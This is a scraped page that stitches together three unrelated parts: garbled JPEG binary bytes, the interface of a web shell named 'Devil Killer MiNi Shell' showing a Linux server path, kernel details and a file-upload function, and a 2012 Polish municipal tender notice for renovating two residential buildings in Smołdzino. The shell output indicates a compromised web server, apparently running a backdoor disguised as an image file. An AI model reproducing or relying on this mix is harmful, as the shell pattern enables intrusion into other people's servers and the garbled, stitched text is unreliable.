JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120827/184101-N-2012.html

<p class="kh_header"><b>Smołdzino: Remont zasiedlonego budynku oraz lokalu mieszkalnego 
w Gminie Smołdzino.
Zamawiający podzielił niniejsze zamówienie na następujące dwie części:
Część I. Remont lokalu mieszkalnego w budynku nr 7, lokal nr 4 w m. Żelazo.
Część II. Remont zasiedlonego budynku mieszkalnego w m. Gardna Wielka przy ul. Ogońskiej 3.</b><br>
<b>Numer ogłoszenia: 184101 - 2012; data zamieszczenia: 27.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Smołdzino , ul.  Kościuszki 3, 76-214 Smołdzino, woj. pomorskie, tel. 59 811 72 15, faks 59 811 74 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.smoldzino.com.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont zasiedlonego budynku oraz lokalu mieszkalnego 
w Gminie Smołdzino.
Zamawiający podzielił niniejsze zamówienie na następujące dwie części:
Część I. Remont lokalu mieszkalnego w budynku nr 7, lokal nr 4 w m. Żelazo.
Część II. Remont zasiedlonego budynku mieszkalnego w m. Gardna Wielka przy ul. Ogońskiej 3..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Część I. Remont lokalu mieszkalnego w budynku nr 7, lokal nr 4 w m. Żelazo.
Budynek, w którym znajduje się lokal mieszkalny jest podpiwniczony, posadowiony na fundamentach żelbetowych. Strop typu Żerań. Ściany nośne gr. 24 cm, 12 cm z bloczków gazobetonowych. Ściany działowe murowane gr. 12 cm. Przekryty stropodachem wentylowanym. Dach kryty papą. Tynki wewnętrzne i zewnętrzne cementowo - wapienne. Malowanie ścian farbami: wapiennymi, kredowymi i emulsją. W pomieszczeniu kuchni lamperia olejna. Podłogi: w pokojach, kuchni i przedpokoju drewniane z desek ułożonych na legarach. W łazience płytki kamionkowe. Stolarka okienna PCV i jedno okno drewniane. Stolarka drzwiowa typowa drewniana. Instalacje: jeden piec kaflowy na dwa pokoje, w kuchni trzon węglowy z wężownicą do podgrzewania ciepłej wody, instalacja wewnętrzna elektryczna, instalacja wewnętrzna wodociągowa.
Lokal mieszkalny składa się z: dwóch pokoi, kuchni, łazienki, korytarza. Powierzchnia użytkowa lokalu wynosi: 36,66 m2.

Zakres prac remontowych jaki należy wykonać określa wyszczególnienie przedmiaru robót:
A1. Zakres remontu obejmuje:
1. Tynki wewnętrzne:
a) zeskrobanie i mycie ze starej farby,
b) gruntowanie ręczne ścian i sufitów,
c) naprawa podłoża, wyrównywanie zaprawą, mocowanie siatki zbrojącej,
d) wewnętrzne tynki na ścianach i sufitach,
e) malowanie dwukrotne ścian i sufitów.
2.   Podłogi i posadzki
a) demontaż płyt pilśniowych twardych,
b) zerwanie posadzki z tworzyw sztucznych,
c) rozebranie podłóg z desek,
d) wykonanie warstw wyrównawczych pod podłogi i posadzki,
e) wykonanie podłóg i posadzki.
3.   Stolarka okienna i drzwiowa
a) wymiana stolarki okiennej,
b) wymiana stolarki drzwiowej.
4.   Przestawienie pieca kaflowego i trzonu kuchennego
a) przestawienie pieca licowanego kaflami,
b) przestawienie trzonu kuchennego.
5.   Roboty wodno - kanalizacyjne
a) wymiana umywalki 1 kpl,
b) wymiana zlewozmywaka z mocowaniem wsporczym szt. 1,
c) wymiana wanny szt. 1,
d) wymiana muszli ustępowej porcelanowej szt. 1,
e) montaż sedesu ustępowego szt. 1,
f) wymiana płuczki ustępowej szt. 1,
g) wymiana baterii umywalkowej szt. 1,
h) wymiana baterii wannowej szt. 1,
i) wymiana podgrzewacza ciepłej wody.
6.  Wymiana instalacji elektrycznej
a) wymiana wewnętrznej instalacji elektrycznej.

Szczegółowy obmiar zawierają rysunki techniczne dokumentacji technicznej inwentaryzacji budowlanej lokalu mieszkalnego.

B. Część II.  Remont zasiedlonego budynku mieszkalnego w m. Gardna Wielka przy ul.   Ogońskiej 3.
Budynek mieszkalny nie jest podpiwniczony, posadowiony na fundamentach ceglanych. Strop nad parterem drewniany belkowy. Belki stropowe o wymiarach poprzecznych 18 x 24 cm. Strop ze ślepym pułapem. Ściany nośne murowane gr. 38 cm. Ściany wewnętrzne murowane gr. 12 cm. Ściany poddasza i ściany szczytowe - kolankowe gr. 25 cm. Tynki zewnętrzne i wewnętrzne cementowo - wapienne. Malowanie ścian farbami: wapiennymi, kredowymi i emulsją. W pomieszczeniu kuchni lamperia olejna. Schody na poddasze drewniane, jednobiegowe, zabiegowe. Dach dwuspadowy o konstrukcji drewnianej. Więźba drewniana krokwiowo - płatwiowa. Krycie dachu płytami z blachy trapezowej średniej fali ułożone na pełnym deskowaniu, z desek gr. 25 mm. Nie występuje sprawne odwodnienie dachu. Brak rynien i rur spustowych. Podłogi w pokojach drewniane - deski ułożone na legarach. W pomieszczeniach kuchni i korytarza oraz spiżarni posadzka cementowa. Stolarka okienna PCV i drewniana. Na poddaszu okna drewniane krosnowe. Stolarka drzwiowa drewniana nietypowa. Instalacje: ogrzewanie piecami kaflowymi szt. 2, trzon kuchenny, wewnętrzna instalacja elektryczna, wewnętrzna instalacja wodociągowa.
Budynek mieszkalny składa się z: dwóch pokoi, kuchni, komórki, spiżarki, korytarza, przedsionka.
Powierzchnia użytkowa budynku wynosi 52, 93 m2
Zakres robót budowlanych remontowych jaki należy wykonać określa wyszczególnienie przedmiaru robót:
B1. Zakres remontu obejmuje:
1. Przemurowanie komina
a) przemurowanie kominów,
	b) spoinowanie ścian kominów
	c) wykonanie obróbki blacharskiej kominów
	2. Pokrycie oraz konstrukcja dachu
	a) demontaż pokrycia dachu z blachy falistej,
	b) demontaż obróbek blacharskich wiatrownic,
	c) demontaż pokrycia dachu z papy na konstrukcji drewnianej,
	d) wymiana deskowania dachu z desek ułożonych na styk,
	e) wymiana elementów drewnianych konstrukcji dachu,
	f) obróbki blacharskie dachu,
	g) montaż rynien dachowych i lejów spustowych, rynien spustowych
	h) pokrycie dachu papą termozgrzewalną,
	i) remont włazu dachowego.
3. Ocieplenie stropodachu
a) wykonanie konstrukcji rusztów pod okładziny,
b) wykonanie izolacji przeciwwilgociowej,
c) wykonanie izolacji termicznej,
d) wykonanie okładzin z płyty gipspwp - kartonowej,
e) wykonanie tynków na sufitach,
f) malowanie tynków.
4. Strop nad parterem
a) wymiana elementów podłóg z desek,
b) demontaż istniejącej izolacji,
c) wykonanie izolacji przeciwwilgociowej,
d) wykonanie izolacji termicznej,
e) wzmocnienie drewnianych belek stropowych,
f) wykonanie odgrzybienia elementów drewnianych,
g) wykonanie impregnacji grzybobójczej elementów drewnianych.
5. Schody wewnętrzne
a) wymiana elementów drewnianych schodów,
b) wymiana poręczy drewnianych schodów.
6. Piece i trzon kuchenny
a) przestawienie pieca kaflowego,
b) przestawienie trzonu kuchennego licowanego kaflami.
7. Podłogi i posadzki
a) rozbiórka podłóg i legarów drewnianych w pokojach,
b) rozbiórka elementów konstrukcji betonowych,
c) wykonanie wykopów wewnątrz budynku przy istniejących fundamentach,
d) wykonanie podkładów betonowych na podłożu gruntowym,
e) wykonanie izolacji przeciwwilgociowej i termicznej,
f) wykonanie warstw wyrównawczych,
g) wykonanie wykładzin z PCW.
8. Wymiana stolarki okiennej i drzwiowej
a) demontaż zużytej stolarki okiennej i drzwiowej,
b) wykucie z muru ościeżnic drewnianych,
c) montaż stolarki okiennej,
d) montaż stolarki drzwiowej.
9. Tynki wewnętrzne
a) odbicie tynków wewnętrznych,
b) przygotowanie i naprawa podłoża, gruntowanie,
c) wykonanie tynków wewnętrznych,
d) wykonanie okładzin na stropach, rusztach metalowych,
e) wykonanie malowania farbami emulsyjnymi powierzchni wewnątrz.
10. Izolacja ścian fundamentowych
a) roboty ziemne fundamentowe, oczyszczenie muru, impregnacja muru,
b) wykonanie tynków renowacyjnych,
c) wykonanie izolacji termicznej muru,
d) wykonanie izolacji przeciwwilgociowej ścian fundamentowych,
e) wykonanie opaski betonowej na podłożu gruntowym przy budynku,
f) montaż daszku nad wejściem do budynku,
g) wykonanie ocieplenia ścian budynku,
h) demontaż obróbek parapetów blaszanych,
i) zbicie tynków z zaprawy cementowo - wapiennej,
j) wykonanie obróbek z blachy powlekanej,
11. Transport gruzu, ziemi i utylizacja papy
a) wywiezienie gruzu,
b) wywiezienie ziemi,
c) utylizacja papy.
12. Wymiana instalacji elektrycznej
a) wymiana instalacji elektrycznej.
Szczegółowy obmiar zawierają rysunki techniczne dokumentacji technicznej inwentaryzacji budowlanej budynku mieszkalnego.

A. Szczegółowy opis przedmiotu umowy oraz szczegółowy zakres robót do wykonania określają projekty-inwentaryzacje, specyfikacje techniczne wykonania robót oraz przedmiary robót 	stanowiące załączniki do SIWZ.

B.  Zaleca się Wykonawcom  przeprowadzenie szczegółowej wizji lokalnej placu budowy celem uzyskania wszystkich  informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia i stanu placu budowy.

C. Podstawą do sporządzenia oferty jest dokumentacja projektowa.

D. Zamawiający zaznacza, że przedmiot zamówienia obejmuje wykonanie robót remontowych   tylko i wyłącznie:
a) dot. części I-lokalu mieszkalnego bez budynku gospodarczego, 
b) dot. części II - budynku mieszkalnego bez budynku gospodarczego
 - zgodnie z przedmiarami robót stanowiącymi załączniki do niniejszej SIWZ.

E.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
F. Wykonawca udzieli 36 miesięcy gwarancji na wykonanie przedmiotu umowy. Okres gwarancyjny rozpoczyna bieg od daty odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-2, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej trzy roboty:
dot. części I-   polegające na wykonaniu remontu lokali mieszkalnych;
dot. części II- polegające na wykonaniu remontu budynków mieszkalnych.
Ocena spełnienia ww. warunków dokonana zostanie zgodnie  z formułą spełnia - nie 	spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w ofercie.Do wykazu Wykonawca musi również dołączyć dokumenty potwierdzające, że roboty te 	zostały wykonane należycie (referencje).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ocena spełnienia ww. warunków dokonana zostanie zgodnie  z formułą spełnia - nie 	spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w ofercie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnieniu warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1 ustawy PZP</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.smoldzino.com.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Urzędu Gminy Smołdzino, ul. Kościuszki 3, 76-214 Smołdzino..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2012 godzina 09:00, miejsce: Sekretariat Urzędu Gminy Smołdzino, ul. Kościuszki 3, 76-214 Smołdzino..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany ze środków budżetu państwa w ramach Programu Pomocy Środowiskom Popegeerowskim realizowanego przez Agencję Nieruchomości Rolnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont lokalu mieszkalnego w budynku nr 7, lokal nr 4 w m. Żelazo..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budynek, w którym znajduje się lokal mieszkalny jest podpiwniczony, posadowiony na fundamentach żelbetowych. Strop typu Żerań. Ściany nośne gr. 24 cm, 12 cm z bloczków gazobetonowych. Ściany działowe murowane gr. 12 cm. Przekryty stropodachem wentylowanym. Dach kryty papą. Tynki wewnętrzne i zewnętrzne cementowo - wapienne. Malowanie ścian farbami: wapiennymi, kredowymi i emulsją. W pomieszczeniu kuchni lamperia olejna. Podłogi: w pokojach, kuchni i przedpokoju drewniane z desek ułożonych na legarach. W łazience płytki kamionkowe. Stolarka okienna PCV i jedno okno drewniane. Stolarka drzwiowa typowa drewniana. Instalacje: jeden piec kaflowy na dwa pokoje, w kuchni trzon węglowy z wężownicą do podgrzewania ciepłej wody, instalacja wewnętrzna elektryczna, instalacja wewnętrzna wodociągowa.
Lokal mieszkalny składa się z: dwóch pokoi, kuchni, łazienki, korytarza. Powierzchnia użytkowa lokalu wynosi: 36,66 m2.

Zakres prac remontowych jaki należy wykonać określa wyszczególnienie przedmiaru robót:
A1. Zakres remontu obejmuje:
1. Tynki wewnętrzne:
a) zeskrobanie i mycie ze starej farby,
b) gruntowanie ręczne ścian i sufitów,
c) naprawa podłoża, wyrównywanie zaprawą, mocowanie siatki zbrojącej,
d) wewnętrzne tynki na ścianach i sufitach,
e) malowanie dwukrotne ścian i sufitów.
2.   Podłogi i posadzki
a) demontaż płyt pilśniowych twardych,
b) zerwanie posadzki z tworzyw sztucznych,
c) rozebranie podłóg z desek,
d) wykonanie warstw wyrównawczych pod podłogi i posadzki,
e) wykonanie podłóg i posadzki.
3.   Stolarka okienna i drzwiowa
a) wymiana stolarki okiennej,
b) wymiana stolarki drzwiowej.
4.   Przestawienie pieca kaflowego i trzonu kuchennego
a) przestawienie pieca licowanego kaflami,
b) przestawienie trzonu kuchennego.
5.   Roboty wodno - kanalizacyjne
a) wymiana umywalki 1 kpl,
b) wymiana zlewozmywaka z mocowaniem wsporczym szt. 1,
c) wymiana wanny szt. 1,
d) wymiana muszli ustępowej porcelanowej szt. 1,
e) montaż sedesu ustępowego szt. 1,
f) wymiana płuczki ustępowej szt. 1,
g) wymiana baterii umywalkowej szt. 1,
h) wymiana baterii wannowej szt. 1,
i) wymiana podgrzewacza ciepłej wody.
6.  Wymiana instalacji elektrycznej
a) wymiana wewnętrznej instalacji elektrycznej.

Szczegółowy obmiar zawierają rysunki techniczne dokumentacji technicznej inwentaryzacji budowlanej lokalu mieszkalnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-2, 45.30.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont zasiedlonego budynku mieszkalnego w m. Gardna Wielka przy ul. Ogońskiej 3..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont zasiedlonego budynku mieszkalnego w m. Gardna Wielka przy ul. Ogońskiej 3.
Budynek mieszkalny nie jest podpiwniczony, posadowiony na fundamentach ceglanych. Strop nad parterem drewniany belkowy. Belki stropowe o wymiarach poprzecznych 18 x 24 cm. Strop ze ślepym pułapem. Ściany nośne murowane gr. 38 cm. Ściany wewnętrzne murowane gr. 12 cm. Ściany poddasza i ściany szczytowe - kolankowe gr. 25 cm. Tynki zewnętrzne i wewnętrzne cementowo - wapienne. Malowanie ścian farbami: wapiennymi, kredowymi i emulsją. W pomieszczeniu kuchni lamperia olejna. Schody na poddasze drewniane, jednobiegowe, zabiegowe. Dach dwuspadowy o konstrukcji drewnianej. Więźba drewniana krokwiowo - płatwiowa. Krycie dachu płytami z blachy trapezowej średniej fali ułożone na pełnym deskowaniu, z desek gr. 25 mm. Nie występuje sprawne odwodnienie dachu. Brak rynien i rur spustowych. Podłogi w pokojach drewniane - deski ułożone na legarach. W pomieszczeniach kuchni i korytarza oraz spiżarni posadzka cementowa. Stolarka okienna PCV i drewniana. Na poddaszu okna drewniane krosnowe. Stolarka drzwiowa drewniana nietypowa. Instalacje: ogrzewanie piecami kaflowymi szt. 2, trzon kuchenny, wewnętrzna instalacja elektryczna, wewnętrzna instalacja wodociągowa.
